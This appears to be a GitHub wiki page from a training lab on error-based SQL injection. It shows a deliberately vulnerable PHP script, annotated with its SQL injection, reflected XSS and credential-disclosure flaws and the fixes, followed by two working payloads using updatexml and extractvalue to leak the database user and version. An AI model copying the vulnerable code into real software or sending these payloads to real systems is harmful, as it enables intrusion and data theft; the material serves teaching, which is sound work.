SQLインジェクション 02 - yujitounai/helloworld GitHub Wiki
エラーベースのSQLインジェクション
<?php
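/**
 * Opens the PDO connection used by the rest of this script and publishes it
 * as the global $pdo (read at top level as $pdo).
 *
 * @throws PDOException when the connection cannot be established. The driver
 *         message is written to the server log and the exception is rethrown,
 *         so a failed connection no longer leaves $pdo undefined and surfaces
 *         later as an unrelated "call on null" error.
 */
function connectDB(){
    // Lab-only DSN and root credentials; a deployed application must not
    // hard-code these in a file that is also served back via highlight_file().
    $dbserver = "mysql:host=mysql; dbname=vuln; charset=utf8";
    $dbusername = "root";
    $dbpassword = "root";
    try {
        $GLOBALS['pdo'] = new PDO($dbserver, $dbusername, $dbpassword);
        // Make driver errors surface as PDOException instead of silent false returns.
        $GLOBALS['pdo']->setAttribute(PDO::ATTR_ERRMODE,PDO::ERRMODE_EXCEPTION);
    } catch (PDOException $e) {
        // The driver message can embed host/user details: keep it in the
        // server log, never in the HTTP response, and do not swallow it.
        error_log('connectDB failed: ' . $e->getMessage());
        throw $e;
    }
}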
// Entry point of the lab script: with ?id=... present, look the id up in
// `users`; otherwise print a usage hint and this file's own source.
if(isset($_GET['id'])){
// Publishes the connection as $GLOBALS['pdo'], read below as $pdo.
connectDB();
// No filter argument => FILTER_DEFAULT (alias of FILTER_UNSAFE_RAW): $id is
// the raw query-string value, nothing has been validated or quoted here.
$id = filter_input(INPUT_GET,"id");
try {
// SINK (SQL injection): $id is pasted into the SQL text with no placeholder
// and no quoting, so the query structure is controlled by the request.
// The fix is a bound parameter, e.g.
//   $stmt = $pdo->prepare("SELECT * FROM users where id = :id limit 1");
//   $stmt->bindValue(':id', (int)$id, PDO::PARAM_INT);
$sql = "SELECT * FROM users where id =".$id." limit 1";
// prepare() gives no protection here: the statement has no placeholders
// left to bind, the injected text is already part of it.
$stmt = $pdo->prepare($sql);
$stmt->execute();
// fetch() yields the first row, or false when no row matched.
$user = $stmt->fetch();
if($user['id']){
// SINK (reflected XSS): the raw $id is echoed inside HTML without
// htmlspecialchars(). Same on the else branch.
echo "<div class=\"main\">id ". $id ." is exist</div>";
}else{
echo "<div class=\"main\">id ". $id ." is not exist</div>";
}
} catch (PDOException $e) {
// Error-based channel: the raw PDOException message (which carries the
// MySQL error text) is written into the response. That is what the
// "error-based" technique on this page reads from; a hardened version logs
// the message server-side (error_log) and returns a generic error instead.
$msg = $e->getMessage();
echo $msg;
}
}else {
echo "usage: ?id=1";
echo "<br>";
// Source disclosure: serves this file verbatim, including the DSN and root
// credentials in connectDB() above. Intended for the lab, never for a
// deployed application.
highlight_file(__FILE__);
}
?>
sqli-02.php?id=1%20and%20updatexml(1,concat(0x3a,user()),1)
sqli-02.php?id=1%20and%20extractvalue(1,concat(%27/%27,version()));